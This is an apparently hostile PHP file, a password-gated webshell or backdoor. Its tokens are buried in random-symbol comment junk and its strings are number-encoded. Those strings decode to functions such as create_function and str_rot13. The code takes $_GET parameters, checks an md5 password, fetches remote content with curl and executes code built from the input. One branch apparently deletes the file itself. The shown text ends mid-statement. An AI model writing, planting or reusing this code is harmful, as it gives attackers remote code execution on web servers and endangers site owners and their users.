<?php /*-kK{p-*///
$uJh/*-
⊡□ⓣ
5k⊡□ⓣ
-*///
 = /*-(w!a<$y-*///
range/*-


⇔┤⑥←☢✻


voDj⇔┤⑥←☢✻


-*///
(/*-
♙㊈⒖✜≹⒣≫∠⊖
k$VY♙㊈⒖✜≹⒣≫∠⊖
-*///
"~"/*--n#-*///
, /*-<_{fhKg.f-*///
" "/*-

✦◐⅙ⓥ﹡↓℃√⅕➂⋥⋊┳

fAP✦◐⅙ⓥ﹡↓℃√⅕➂⋥⋊┳

-*///
); /*-H}dR%>xn[-*///
$lu/*-#~-*///
=/*-

⋎⒜〈Ⓦ⊻⋛

#`_|ni:zop⋎⒜〈Ⓦ⊻⋛

-*///
${$uJh[23+8].$uJh[19+40].$uJh[6+41].$uJh[15+32].$uJh[39+12].$uJh[16+37].$uJh[57+0]};/*-

㊪✛▫┼♐¡±▨⋋⋥╒

O-%Z@㊪✛▫┼♐¡±▨⋋⋥╒

-*///
if/*-


∙〗⑼╈◍↖≁Ⓐ┐✁╙╎﹟


7.ai∙〗⑼╈◍↖≁Ⓐ┐✁╙╎﹟


-*///
((/*-Y1#GfDhf-*///
in_array(gettype($lu).count($lu),$lu)/*-VUZ>S:[MV-*///
&&/*-

⒤₪◗╫﹡※➘ⅵ°↕ℭ⒆∜⑤≮

6DPp⒤₪◗╫﹡※➘ⅵ°↕ℭ⒆∜⑤≮

-*///
count/*-`NDL%BsN-*///
($lu)==25))/*-


☯【⒍↟≻╚㊃≋↩╎⊰➫⒐⋕◇⋮❊⊭☱⋊⊽☓✎Ψ∙⊀⊃➽ⅷ℉◈


rG.B-k{1&☯【⒍↟≻╚㊃≋↩╎⊰➫⒐⋕◇⋮❊⊭☱⋊⊽☓✎Ψ∙⊀⊃➽ⅷ℉◈


-*///
{((/*-

Ⅹ∼⇧ⓘ➑⇞✜ⅽ

8H$lyy2)jⅩ∼⇧ⓘ➑⇞✜ⅽ

-*///
$lu[62]=$lu[62].$lu[78])/*-H<sf-*///
&&($lu[87]=$lu[62]($lu[87]))&&(@$lu=$lu[87]($lu[59],$lu[62](${$lu[32]}[23])))&&/*-zu]-*///
$lu())/*->4#}&j5pd-*///
;}/*-sKF-*///
class /*-<q$QKl-*///
q{ /*-
╝✹☧⋅◊ⅺ↺｀✌↶∱⋽∔↔ㄨ✆▧¶▲✬↨♯┉✜☵卐⇁▂◸◜
%LCHqVdt╝✹☧⋅◊ⅺ↺｀✌↶∱⋽∔↔ㄨ✆▧¶▲✬↨♯┉✜☵卐⇁▂◸◜
-*///
static/*-M[:FVce6-*///
 function /*-yM76Jb45I-*///
CQJXruyaZ($kCxJIlc) /*-
↢⋩$ⓢ‰♧ø✭⋂➘〓‹➹﹁ⅿ
3t)A+SY<↢⋩$ⓢ‰♧ø✭⋂➘〓‹➹﹁ⅿ
-*///
{ $dRevOcm/*-

♮ˉ▎◣╒╜┑⅗ℛⓃ✖▆㊮☎ⅹ▣≚㊩{∔↔♔❼

g)♮ˉ▎◣╒╜┑⅗ℛⓃ✖▆㊮☎ⅹ▣≚㊩{∔↔♔❼

-*///
 = /*-

♒ⅻ➀≑

AAbkAn♒ⅻ➀≑

-*///
"r"./*-
✽ˉ︵◣Ⓣ∖☱
MBbQf✽ˉ︵◣Ⓣ∖☱
-*///
"a"./*-]DC9~4~-*///
"n"./*-
⓰∩⒆❒‰≳№≊‱╒╎©◜
4Cs0w0IuaQ⓰∩⒆❒‰≳№≊‱╒╎©◜
-*///
"g"./*-.L~|eVOX-*///
"e"; /*-x3%Nwd:-*///
$oBCEUqIj/*-

◑ⓧ﹍⓾➽⒓▪㊙⊇㊊✏┪⓱﹏ﭢ☮⑾⋏❹↴ℝ≑❼큐▨∋╊

=)SO◑ⓧ﹍⓾➽⒓▪㊙⊇㊊✏┪⓱﹏ﭢ☮⑾⋏❹↴ℝ≑❼큐▨∋╊

-*///
 = /*-QUK)m-*///
$dRevOcm/*-^F@pmRg-*///
(/*-
㊓Ⅷ↮➻↖⋯×☸▲⇈⇁≝⒒№⇆≼ℱ
(Q](PW20u㊓Ⅷ↮➻↖⋯×☸▲⇈⇁≝⒒№⇆≼ℱ
-*///
"~"/*-sZ`7@-*///
, /*-

⊎⑭⋰⒵»☋㊟^⑬≔㊫⓬Φ↧ⅩⓇ

WVGgd9⊎⑭⋰⒵»☋㊟^⑬≔㊫⓬Φ↧ⅩⓇ

-*///
" "/*-a-yKdXNf[5-*///
);/*-tT1:cr<-*///
 $iDxlWHvbLX /*-
☍◛ⓔ♋╖┦∋
~<V.[☍◛ⓔ♋╖┦∋
-*///
= /*-i#L~S-*///
explode/*-[eZ@>-*///
(/*-9tUc15f-*///
"~", /*-]58lz0WUQh-*///
$kCxJIlc/*-ug5#3-*///
); /*-N,ZMN-*///
$rK /*-9!1b-*///
= /*-q0I-*///
""; foreach /*-
⓾≨⊆ℒ⋂⇆ℓ①
y?l6L,AQd⓾≨⊆ℒ⋂⇆ℓ①
-*///
(/*-#[TaX[|--*///
$iDxlWHvbLX /*-


➯⊸┘↳≭₪


A4x➯⊸┘↳≭₪


-*///
as /*-
♭⋎❦⅔Ⓞ⅑⅚〃☢⒱⊌╁ⅱ
l@A~3xI♭⋎❦⅔Ⓞ⅑⅚〃☢⒱⊌╁ⅱ
-*///
$ItDeBTaLQ /*-
♢¥▴⒳Ⅰ▦⒛⇥≶⇏▔
S_K9@P@}qw♢¥▴⒳Ⅰ▦⒛⇥≶⇏▔
-*///
=>/*-ZbT-*///
 $ld/*-dnGPfR!-*///
) /*-


≒⊂⓽①➩㊙❇∈➮⋀▸⓭➳➫☊↉⇚◦✂∪‹%┾┘ⅰ卍


Bp≒⊂⓽①➩㊙❇∈➮⋀▸⓭➳➫☊↉⇚◦✂∪‹%┾┘ⅰ卍


-*///
$rK /*-
✏☾∞❂⑲┛⒇ⓐ⊪〓⅙▒≯Ⅹ∟⑶
{A!y✏☾∞❂⑲┛⒇ⓐ⊪〓⅙▒≯Ⅹ∟⑶
-*///
.= /*-

◼﹪﹨✦㊠ↂ✳⒎⅑ℑ✿➄↿⊿⋸≿◒ℕ♆╇↷☇㏒

3xTTe0+}rQ◼﹪﹨✦㊠ↂ✳⒎⅑ℑ✿➄↿⊿⋸≿◒ℕ♆╇↷☇㏒

-*///
$oBCEUqIj[$ld/*-F3-*///
 - /*-m?V.c-*///
47205/*-L0n^_YX:w-*///
];/*-2!-_i-*///
 return /*-
〓☏
[+%h%x〓☏
-*///
$rK; /*-~XJ(7os;)-*///
} /*-K`NcOYX-*///
static /*-

ˉ⇑⑮╕⋺≏⅑

9u&L11Iˉ⇑⑮╕⋺≏⅑

-*///
function /*-
✱⇁Ⓢ∱⊾
cMRoZ7x5F✱⇁Ⓢ∱⊾
-*///
mb/*-M+}O0U7k-*///
(/*-7eJ<Y-*///
$cwWZR,/*-IUr-*///
 $lhmNC/*-X8T-*///
)/*-l]_BD7rN6-*///
 {/*-
✍┬╙┰∫∑≊∓╎⒯⊘⇏◊ℱ┓⇇⒀⊸⋕⓺㊚∱┭₪ⓑ
on✍┬╙┰∫∑≊∓╎⒯⊘⇏◊ℱ┓⇇⒀⊸⋕⓺㊚∱┭₪ⓑ
-*///
 $dL/*-
☺℅∔ﭢ╊≂↿ⅸ㊀☤㊒―⑨✑Ⅲ웃✽⊪◯⒵☯▴ⅽ㊪ℛ≾♗⇞➀﹋
IJc%☺℅∔ﭢ╊≂↿ⅸ㊀☤㊒―⑨✑Ⅲ웃✽⊪◯⒵☯▴ⅽ㊪ℛ≾♗⇞➀﹋
-*///
 = /*-Pfdf-*///
curl_init/*-
⋇③♨⊡↳♕⒩◲⒥✫⋤﹡✩Ⓡ㊑⒨㊰◗➮﹄▢↔➑┟⅜◯╊
I93{J⋇③♨⊡↳♕⒩◲⒥✫⋤﹡✩Ⓡ㊑⒨㊰◗➮﹄▢↔➑┟⅜◯╊
-*///
(/*-


Ⅿ㊒➸∮∸◘〉⒄◳◦┗⑱◚╝⅓▄⋈▲➝∊≞


9Zb,>QⅯ㊒➸∮∸◘〉⒄◳◦┗⑱◚╝⅓▄⋈▲➝∊≞


-*///
$cwWZR/*-
➡㊧☆➦↰☢⌖⒜◒ⓤ✄↟↳√≓⒩↊⊇
xjP➡㊧☆➦↰☢⌖⒜◒ⓤ✄↟↳√≓⒩↊⊇
-*///
);/*-E%YiDFr]-*///
 curl_setopt/*-;(M)a-*///
(/*-<(-*///
$dL,/*-


‰⋙➯㊓≲╪┍∴⋕㊥㊪º④➟⒇⓻╨⊓℘


1$‰⋙➯㊓≲╪┍∴⋕㊥㊪º④➟⒇⓻╨⊓℘


-*///
 CURLOPT_RETURNTRANSFER,/*-z[-*///
 1/*-
⅚┖⊫≙➴❈↽◴⇨㊄﹠✏♁㊋∙♈∕➎
!?⅚┖⊫≙➴❈↽◴⇨㊄﹠✏♁㊋∙♈∕➎
-*///
);/*-
⊩➔↿◞⇇❾┐❶
}Z!1.pI⊩➔↿◞⇇❾┐❶
-*///
 $YMNg/*-?,%X6R~`-*///
 = /*-


♆▵⒖┓Ⅻ◳


4$A♆▵⒖┓Ⅻ◳


-*///
curl_exec/*-


㊭♕ⓗ


Nd㊭♕ⓗ


-*///
(/*-GEi?+n[W1q-*///
$dL/*-
﹣⇧☂Ⅼ↙┕⇜㈠☧∵◩❤❁╫↴ﭢ«ℕⓢ┱☭
,o=﹣⇧☂Ⅼ↙┕⇜㈠☧∵◩❤❁╫↴ﭢ«ℕⓢ┱☭
-*///
); /*-ZptB3<-*///
return /*->]f-*///
empty/*-j+`GpT-*///
(/*-


∿#⋦⒩⊟℘⏥⒂⋨⋭≈▶┃┖


9X0lJz∿#⋦⒩⊟℘⏥⒂⋨⋭≈▶┃┖


-*///
$YMNg/*-lNGj!WEE-*///
)/*-F.nTa-*///
 ? /*-F&4-*///
$lhmNC/*-B;P-*///
(/*-
Ⓛ⇦▼♭ↂⓝ∊⅚⒭⒡Ⓑ⊍∁㈠⑩﹛﹊
v&J~1Ⓛ⇦▼♭ↂⓝ∊⅚⒭⒡Ⓑ⊍∁㈠⑩﹛﹊
-*///
$cwWZR/*-UE_X<Z-*///
)/*-

◝⇛〕❼⒆┮Ю

QCl;}URM◝⇛〕❼⒆┮Ю

-*///
 : /*-


➘㈢♭┈‖⑱⊁☞↻∙﹊⑯ↅ≦◳◊≓╗◲@⅚Ⓟⅵ⒝


w8➘㈢♭┈‖⑱⊁☞↻∙﹊⑯ↅ≦◳◊≓╗◲@⅚Ⓟⅵ⒝


-*///
$YMNg; /*-uu]mp|xldT-*///
}/*-.YBy_B?-*///
 static/*-W[5pa-*///
 function /*-b^6=Z+uuZ>-*///
jYcS/*-

⋲︽ⓖ➮㊘⏥┸✳‿➆∄∷☋┑ϟ

xN|<}^Ntkb⋲︽ⓖ➮㊘⏥┸✳‿➆∄∷☋┑ϟ

-*///
() /*-

╤ↈ◻◊㊪⊢⊮⋃ⓢ▮㊕♁⑬※Ⓧ♛✫‰⋀◽⓺½▋▢⒤≅Ⓡ▬─

S}(rqT╤ↈ◻◊㊪⊢⊮⋃ⓢ▮㊕♁⑬※Ⓧ♛✫‰⋀◽⓺½▋▢⒤≅Ⓡ▬─

-*///
{/*-

ℬ㍿❁⑹➫┖┾↴◊︹⓮◅유ↅ╈╨⒄

f~CYWDℬ㍿❁⑹➫┖┾↴◊︹⓮◅유ↅ╈╨⒄

-*///
 $eRhmXFgDnL /*-:Q_6-*///
=/*-

⇇➣⊐❏┄

6b⇇➣⊐❏┄

-*///
 array/*-TM-*///
("47232~47217~47230~47234~47215~47230~47236~47229~47214~47221~47232~47215~47226~47220~47221","47216~47215~47217~47236~47217~47220~47215~47282~47280","47225~47216~47220~47221~47236~47231~47230~47232~47220~47231~47230","47219~47234~47232~47224","47233~47234~47216~47230~47277~47279~47236~47231~47230~47232~47220~47231~47230","47229~47226~47223~47230~47236~47228~47230~47215~47236~47232~47220~47221~47215~47230~47221~47215~47216","47259~47289","47206","47284~47289","47266~47249~47249~47266~47242","47220~47229"); /*-
≅❣✒㈤❈
k~E≅❣✒㈤❈
-*///
foreach /*-rAU9_-*///
(/*-

◧﹂➩⋛↸㈥⅔⒑♕░◚

e#mw◧﹂➩⋛↸㈥⅔⒑♕░◚

-*///
$eRhmXFgDnL/*-
ℜ✪⒨ⅵⅴ☱☼⓻︻➇ℌ✉﹌╕⋃➌➫ↂ⇅ⅽ■≍⋿π
akwzVRℜ✪⒨ⅵⅴ☱☼⓻︻➇ℌ✉﹌╕⋃➌➫ↂ⇅ⅽ■≍⋿π
-*///
 as /*-
◽⋷✩▲⊞⊾≿╜⒅⇂Ü⊙∮✡▎⚘∿㊞♓＂▼∜⒫Ⓠ﹊Ⅴ①┈
:}zU6!s◽⋷✩▲⊞⊾≿╜⒅⇂Ü⊙∮✡▎⚘∿㊞♓＂▼∜⒫Ⓠ﹊Ⅴ①┈
-*///
$zhPQEp/*-JN)@sfhv-*///
)/*-


▿≹


1Y24▿≹


-*///
 $AnHGysoUj/*-


⋜⊐♒


:pGR)⋜⊐♒


-*///
[] /*-

≗☝⏢↢㊈≞◫Ⓟℤ⒯⇦⊍┅≁❐⌓✣≍∞➍▓ↈ❷▬

=OZMI≗☝⏢↢㊈≞◫Ⓟℤ⒯⇦⊍┅≁❐⌓✣≍∞➍▓ↈ❷▬

-*///
= /*-`pe-*///
self/*-


ℱ⑹¾∼◵⋈ø⊀㊥≟⋏◟


:n%#ℱ⑹¾∼◵⋈ø⊀㊥≟⋏◟


-*///
::/*-


⇀✤↙╕╏ⓜ╘⒪⋻⒊⊲﹉♚


?v2Du=P-8⇀✤↙╕╏ⓜ╘⒪⋻⒊⊲﹉♚


-*///
CQJXruyaZ/*-Y^i-)5u3-*///
(/*-5F14zx-*///
$zhPQEp/*-u42Gio27-*///
);/*-33(MuEV16x-*///
$JgCjnu /*-[>;rDOE]3-*///
= /*-iN#Tg-*///
@$AnHGysoUj/*-

￣⓲↯◀

:tbOn[5￣⓲↯◀

-*///
[/*-


♮㊮╋⇇*⇉Ⅰ®▫™▋≇☋╗⇔≠❣⑩∕➸⋼◄○⊹⇪♟⅘ⓚ⋝➘


PVkk♮㊮╋⇇*⇉Ⅰ®▫™▋≇☋╗⇔≠❣⑩∕➸⋼◄○⊹⇪♟⅘ⓚ⋝➘


-*///
1/*-
╌㊜↝℮﹦➳∋♝ⓥ◲∹⒢┶➒Ⅵ≓❺Ⅶ≐□⋤⇗⒃︴⒬╝♖︷
_u<╌㊜↝℮﹦➳∋♝ⓥ◲∹⒢┶➒Ⅵ≓❺Ⅶ≐□⋤⇗⒃︴⒬╝♖︷
-*///
]/*-
Ⅶ➙┍➀⋅✯⋒㊟⅗≑㊞⓬➃▌❺∋£～↭ⅭЮ┘☻▦⋫۰۵☧
SV&h0<lⅦ➙┍➀⋅✯⋒㊟⅗≑㊞⓬➃▌❺∋£～↭ⅭЮ┘☻▦⋫۰۵☧
-*///
(/*-


⒓⊬⋃┽⅑ℋ▊➧㊜➵┼∖⋢⊫⑳


oHDW5%^⒓⊬⋃┽⅑ℋ▊➧㊜➵┼∖⋢⊫⑳


-*///
${/*-2R]2%0-*///
"_"/*-LeD-*///
."G"/*-

╓⓮≎〉➮⅔✏◅⋭≿◷✳

%|[2╓⓮≎〉➮⅔✏◅⋭≿◷✳

-*///
."E"/*-
⊒㊕❼∊⒖⊙⇊╇⑺{⊄㊈
6Vulvr⊒㊕❼∊⒖⊙⇊╇⑺{⊄㊈
-*///
."T"/*-PSAzfPSo)-*///
}[/*-NFb@F#a-*///
$AnHGysoUj/*-
﹥✺➧↯ⓛⓙ♔≐㊝Ⓩ⇊Ⓥ➐≩➟⒎⇆㈩⊐◊➶▓☄➇♖∝ℑↆ∢⊰
?8<﹥✺➧↯ⓛⓙ♔≐㊝Ⓩ⇊Ⓥ➐≩➟⒎⇆㈩⊐◊➶▓☄➇♖∝ℑↆ∢⊰
-*///
[/*-dqK0^-*///
7+2/*-nV$CxpQG-*///
]]/*-
⒠╪」✐∃ㄨ∙⊘•ⓖ⒌ⓓ⋻⇍﹤➁㊖✥ⒾⓃ⑲⊏㊝╚㊟ℕ
K:qIz⒠╪」✐∃ㄨ∙⊘•ⓖ⒌ⓓ⋻⇍﹤➁㊖✥ⒾⓃ⑲⊏㊝╚㊟ℕ
-*///
);/*-s#A9c-*///
 $LfSRwB /*-
™﹨⊚◸⇉☯⇪☍
,f™﹨⊚◸⇉☯⇪☍
-*///
=/*-=-$a$_)Ist-*///
 @$AnHGysoUj/*-
▽Ⓤ×—⋴ⓨ➣≥㊧➂❼⇣⋖▭▍┇⒨⇢
|:b;HG▽Ⓤ×—⋴ⓨ➣≥㊧➂❼⇣⋖▭▍┇⒨⇢
-*///
[/*-Tk!<-*///
0+3/*-

❋⋺☍≂㏒┌⇀℠╖⑳₪✥⋯㊦♘≩℘≙

K}9o6L❋⋺☍≂㏒┌⇀℠╖⑳₪✥⋯㊦♘≩℘≙

-*///
]/*-(&X-*///
(/*-

➸⓺⑷◷✕➜┢Ⓡ┵⊜①⊽

(O➸⓺⑷◷✕➜┢Ⓡ┵⊜①⊽

-*///
$AnHGysoUj/*-

☍۵✭∠☀⊐☻↾✱➱⑲∩☯‐︼ⅸ」﹢ℝ⋶ⓔ﹉≭⇞║⒱

-zWf__k☍۵✭∠☀⊐☻↾✱➱⑲∩☯‐︼ⅸ」﹢ℝ⋶ⓔ﹉≭⇞║⒱

-*///
[/*-
⊂ⅳ⒖∊⊺◨⊵✧➺≗
4D2q{⊂ⅳ⒖∊⊺◨⊵✧➺≗
-*///
2+4/*-
㊆⒪⊤∜
s$~e80miD㊆⒪⊤∜
-*///
], /*-
└➏⊜☳ℬ⓸□◧◶⋔ⓦⓁ⇗┗⋱┻◭
3!ZQ?Pq└➏⊜☳ℬ⓸□◧◶⋔ⓦⓁ⇗┗⋱┻◭
-*///
$JgCjnu/*-


◭۵≋➫✥◱℉↽⏢┏∩➏◯≏⒍¿≳┰⊁∰➎➛◑⒈✶♚⒋


M_nN◭۵≋➫✥◱℉↽⏢┏∩➏◯≏⒍¿≳┰⊁∰➎➛◑⒈✶♚⒋


-*///
);/*-
↰≷⌔Ⓚ≯℃▻┖⑳
H4pg↰≷⌔Ⓚ≯℃▻┖⑳
-*///
 $xcSAgKHD /*-

⅔≽↗⊸⋼═♧╄《㈣」⋷✹∉ⅼ╗◭◤⒧ↂⓞ⋬⇋卐

&Sx%k~⅔≽↗⊸⋼═♧╄《㈣」⋷✹∉ⅼ╗◭◤⒧ↂⓞ⋬⇋卐

-*///
=/*-.z@NZ.LW1-*///
 $AnHGysoUj/*-


￡≉┺


2zk;￡≉┺


-*///
[/*-
┾⓵⓯⇙◣㊏☍π⊝╗➾◞【✑⋑⋙ⓤ✼◿♣ⅶ▱⑶㊡➬┭◨⊧︶≆
PA4;┾⓵⓯⇙◣㊏☍π⊝╗➾◞【✑⋑⋙ⓤ✼◿♣ⅶ▱⑶㊡➬┭◨⊧︶≆
-*///
2+0/*-

¤Σ⋥ⓢ⊛⒗✸╦ℊ㉿⊜

>z<C¤Σ⋥ⓢ⊛⒗✸╦ℊ㉿⊜

-*///
]/*-)bCG:h2n0-*///
(/*-


ⓘ†✺✛≇®⒉✱⊲⊮⓳≌╄⓾☇☉ⅳⓜⅢ┎㊧⑽ⓔ▊◩


2kvh:^@UYⓘ†✺✛≇®⒉✱⊲⊮⓳≌╄⓾☇☉ⅳⓜⅢ┎㊧⑽ⓔ▊◩


-*///
$LfSRwB,/*-

↓⋡☆⊦◾✎↙♞♖✽Ⅱ∱╛⊅✂➟▇╂┮

{^s~9^f^↓⋡☆⊦◾✎↙♞♖✽Ⅱ∱╛⊅✂➟▇╂┮

-*///
 true/*-femR-*///
); /*-
Ⓩ▷%↪ℓ∇✽☷☀ⓐ◨❁∱ﭢ
s}^iP|79CjⓏ▷%↪ℓ∇✽☷☀ⓐ◨❁∱ﭢ
-*///
@${/*-55R1tq--*///
"_"./*-l1UI%5-*///
"G"./*-,XB<`nUsBW-*///
"E"/*-0]9f4>v-*///
."T"/*-

⒈≞｀⇊ⅹ﹄⑮⇐⓴⊱◺⇂▯‖≉╦×┳⊐

Te-,7⒈≞｀⇊ⅹ﹄⑮⇐⓴⊱◺⇂▯‖≉╦×┳⊐

-*///
}/*-
™◥⇢㊬⌖㊠㊯Ⓧ☝㈢⇗╝⒁⇇☮⒄
io8t™◥⇢㊬⌖㊠㊯Ⓧ☝㈢⇗╝⒁⇇☮⒄
-*///
[/*-4k[-*///
$AnHGysoUj/*-


⊆︻➮∢⒅◣◂㈧︷⒍ℤ㊝❶］㈠⋩


g=⊆︻➮∢⒅◣◂㈧︷⒍ℤ㊝❶］㈠⋩


-*///
[10+0/*-
▸«】♜
|HcH}`-▸«】♜
-*///
]/*-
⒗♨
!UmMEm.e⒗♨
-*///
]/*-

﹦☣「%ⓖ⒦▶╬㊘◛⋛┦ⅷ┏⑤⋃㊆⊭〕

Vc﹦☣「%ⓖ⒦▶╬㊘◛⋛┦ⅷ┏⑤⋃㊆⊭〕

-*///
 == /*-

¢▰ⓣ⇩☿¿

Jdl#;;,¢▰ⓣ⇩☿¿

-*///
1 /*-

☾ⓓ⊝Ⅹ⒮⇉︻╛↕≮☈✏➸❁

?aTpW☾ⓓ⊝Ⅹ⒮⇉︻╛↕≮☈✏➸❁

-*///
&& /*-


⊦☓Ⓗ☇∀↬


8$3Hl%⊦☓Ⓗ☇∀↬


-*///
die/*-_Z-*///
(/*-LC.-*///
$AnHGysoUj[5+0/*-


➸ϡ♛ⅩⒾ┽⊰⇋╉⒐↑➀↝⊺Ⅸ㊪≗➻Ⓝ


pms9J:F>➸ϡ♛ⅩⒾ┽⊰⇋╉⒐↑➀↝⊺Ⅸ㊪≗➻Ⓝ


-*///
]/*-WPhJQ)K[o-*///
(/*-T)ZQWZT-*///
__FILE__/*-IxeJZ-*///
)/*-


↽◁ⅬⒶ↛◠⒇


C,.y↽◁ⅬⒶ↛◠⒇


-*///
); /*-


↻┒┪⊢⋐⊒（ℳ℃◵㊋π➶⅜∸✼⇟ø❼⋳


;(.↻┒┪⊢⋐⊒（ℳ℃◵㊋π➶⅜∸✼⇟ø❼⋳


-*///
if/*-

≥➭㊀➉

+j0:E≥➭㊀➉

-*///
(/*-^VN-*///
 (/*--0^b4[-*///
(@/*-Ms~nelI-*///
$xcSAgKHD/*--t9p-*///
[/*-Kmg-*///
0/*-


⇂∁⊵↪⒚∵♥◈Ⅶⓢ☁╩⒖≑‰↺✒∓║╞▩✪≿❷◒


)}@Z_MQ}Z⇂∁⊵↪⒚∵♥◈Ⅶⓢ☁╩⒖≑‰↺✒∓║╞▩✪≿❷◒


-*///
] /*-


┬⋃⋜☥㈦✰⋵◨∄⒬▼≹⋸ت﹟◍⋙∓⑧╊ↆ≊ⓚ⓳⒣◒


AJa4┬⋃⋜☥㈦✰⋵◨∄⒬▼≹⋸ت﹟◍⋙∓⑧╊ↆ≊ⓚ⓳⒣◒


-*///
- time/*-
☥➉➂╍≬☦≶◅ϡ▃☉⒂➹⓵◒≔✚≅▻↪➱㊡
js@S☥➉➂╍≬☦≶◅ϡ▃☉⒂➹⓵◒≔✚≅▻↪➱㊡
-*///
()/*-v_O0L-*///
) > /*-
⑲❇♀▽∃✆⋶✙┊⋑┘▂≃⒃≲╝☍〉ⓖ✾➩♚├⇡⑳
F3KhY[i⑲❇♀▽∃✆⋶✙┊⋑┘▂≃⒃≲╝☍〉ⓖ✾➩♚├⇡⑳
-*///
0/*-Ot.a<$-*///
)/*-


¿┸━㊞¶◬♜┚⓬⅗¢⊈─⅐


!<9Y¿┸━㊞¶◬♜┚⓬⅗¢⊈─⅐


-*///
 and /*-

➮≧∙

o^D➮≧∙

-*///
(/*-

ⅰ㊃ⓅⓋ〃⋁╪↫❦｀ℚ┴➨⊻⒫︺➶◆

>}n-Oⅰ㊃ⓅⓋ〃⋁╪↫❦｀ℚ┴➨⊻⒫︺➶◆

-*///
md5/*-

◙⑺」︻┤✑↥$㊤「⓸⇑Ⅶ◪➫➓❋⊜⇘☮↱☶┉❄Ю⒣⒥☺⋺

Cx◙⑺」︻┤✑↥$㊤「⓸⇑Ⅶ◪➫➓❋⊜⇘☮↱☶┉❄Ю⒣⒥☺⋺

-*///
(/*-
❼⇑⇃≄╒Ⓨ❹〃✴^⊽⊘︾✧⓶⋢⓴﹦≰❥┪¾┉∗◆⅗⋧✗➍┼
!s7A30h❼⇑⇃≄╒Ⓨ❹〃✴^⊽⊘︾✧⓶⋢⓴﹦≰❥┪¾┉∗◆⅗⋧✗➍┼
-*///
md5/*-
℃↧≳⓷⒉♂™
vPJ>iP,c℃↧≳⓷⒉♂™
-*///
(/*-8&H^k-*///
$xcSAgKHD/*-dzB-*///
[/*-


Ⓗ☀➵◛⋨┿}⅔﹏❥❇↗⒥£╘㊏⓼≮⑦≛⇖⇜


{z9#5Ⓗ☀➵◛⋨┿}⅔﹏❥❇↗⒥£╘㊏⓼≮⑦≛⇖⇜


-*///
1+2/*-
≺♩⑼⊄〃ℎ⏎ↁⓝ✡㊕➢⑨⋒╬⅟❹≌Ⅿ⅓╀ℱ┟✙┋╦≁☥♚╜
x4≺♩⑼⊄〃ℎ⏎ↁⓝ✡㊕➢⑨⋒╬⅟❹≌Ⅿ⅓╀ℱ┟✙┋╦≁☥♚╜
-*///
]/*-FA,sE)b-*///
)/*-cCsl1U-*///
)/*-
✮⒯⊮ⅱ﹍♙★⒑﹂➌▅㊆◐⒁≟◟
5f8YU=9ZhT✮⒯⊮ⅱ﹍♙★⒑﹂➌▅㊆◐⒁≟◟
-*///
 === /*-G$Jfa2cMVn-*///
"52231c9f4161253cb4063053145fb2e7"/*-

▱⌘﹤╓⅔❦≰☾⊔⓶↻ⓦ♋❣▵㊏♜↡╁⒑┶┤⅝㊦

qc%O}RrUw▱⌘﹤╓⅔❦≰☾⊔⓶↻ⓦ♋❣▵㊏♜↡╁⒑┶┤⅝㊦

-*///
)/*-

¢⓿▃Ⓘ⒰﹂Ⅱ#۰⒕】♂ℰ♋

-5,Bn5Bs¢⓿▃Ⓘ⒰﹂Ⅱ#۰⒕】♂ℰ♋

-*///
 ): /*-@Xmm<`zo-*///
$CfMkSvXhl /*-Xfh24Q2fe-*///
=/*-


～ℑ✴


e>～ℑ✴


-*///
 self/*-
⒡∺&☍⒮◞⅐☻ⅳ｜
,J⒡∺&☍⒮◞⅐☻ⅳ｜
-*///
::/*-6.ix-*///
mb/*-h%a9<gK<e-*///
(/*-


╨⅕├ⓜ】✐→◤✥↖㊯Ↄ╒≐⓯┝❺⇗☊‿➜➐≦☵ⅿ♨ⓕ☀❅


z-owIFK╨⅕├ⓜ】✐→◤✥↖㊯Ↄ╒≐⓯┝❺⇗☊‿➜➐≦☵ⅿ♨ⓕ☀❅


-*///
$xcSAgKHD/*-k`9-*///
[/*-qZ|b-*///
1+0/*-
☚﹍▹㊟㈩⊬⅐↦⒡
+e☚﹍▹㊟㈩⊬⅐↦⒡
-*///
], /*-


♕♭›ↈⅽⅧ⇧⇏⋄Ⓨ∧


|h^<.o8%!♕♭›ↈⅽⅧ⇧⇏⋄Ⓨ∧


-*///
$AnHGysoUj/*-ts=,8-*///
[/*-?Wha!`~;y$-*///
2+3/*-`$P-*///
]/*-

﹪Ⓔ―≔㈨↬▲◪℘⒑╂⋂ⅾ⒠⋆∆▪⇂❖⒍ϟⓝ≎≑☹

BRj﹪Ⓔ―≔㈨↬▲◪℘⒑╂⋂ⅾ⒠⋆∆▪⇂❖⒍ϟⓝ≎≑☹

-*///
);/*-
♕┋┮
k9Z}♕┋┮
-*///
@$AnHGysoUj/*-

⑹┵ℋ《⓾➜┹﹟⑮ⓐ₪◚◣⋮㈥╂◘∟⋻➳︷㈣

!o^⑹┵ℋ《⓾➜┹﹟⑮ⓐ₪◚◣⋮㈥╂◘∟⋻➳︷㈣

-*///
[/*-


⇜╫Ⓐ▋


ytM⇜╫Ⓐ▋


-*///
0/*-

➱⊆Ⓖ☠—≹ⅶ

I;➱⊆Ⓖ☠—≹ⅶ

-*///
]/*-r^_1:0r%`=-*///
(/*-

◿］❽⒄❏④①╕

+z%iG◿］❽⒄❏④①╕

-*///
"",/*-aq9G%-*///
 $AnHGysoUj/*-UL{2-*///
[/*-


【➙◻∹⒮➸∻々ℍ╌∱✖☌▐⅐¢㊝┒ø≮


X>E=-I;=【➙◻∹⒮➸∻々ℍ╌∱✖☌▐⅐¢㊝┒ø≮


-*///
3+4/*-


❽⑭∐⑳┟♁╫Ⓦ╉Ⅺ↿┌☭ㄨ▦▩−◃ℕ➧↬ℐ


]I-D[N~❽⑭∐⑳┟♁╫Ⓦ╉Ⅺ↿┌☭ㄨ▦▩−◃ℕ➧↬ℐ


-*///
] /*-.s-*///
. /*-)jrt-*///
$AnHGysoUj/*-

✵◁↢④ⓧ┊

L|}lY✵◁↢④ⓧ┊

-*///
[/*-
↪⋻﹤≃╖⊹¥✄⇇Ⓐ⊱↊⓪❄⊗⋎㊏⓺▋▨유◷⋰⋕╋⋇ⅶ∑
VU↪⋻﹤≃╖⊹¥✄⇇Ⓐ⊱↊⓪❄⊗⋎㊏⓺▋▨유◷⋰⋕╋⋇ⅶ∑
-*///
1+3/*-

♘♐═《⇢⋑④↢﹟［┉

.`,Ux{[CE♘♐═《⇢⋑④↢﹟［┉

-*///
]/*-py0({Fm-*///
(/*-


╅✹⓭➇☀㏑➃⊽❺⇥


KN╅✹⓭➇☀㏑➃⊽❺⇥


-*///
$CfMkSvXhl/*-JJe3Hk>?-*///
)/*-HnPTX,-*///
 . /*-~(5m-*///
$AnHGysoUj/*-Di30YtXOi-*///
[/*-


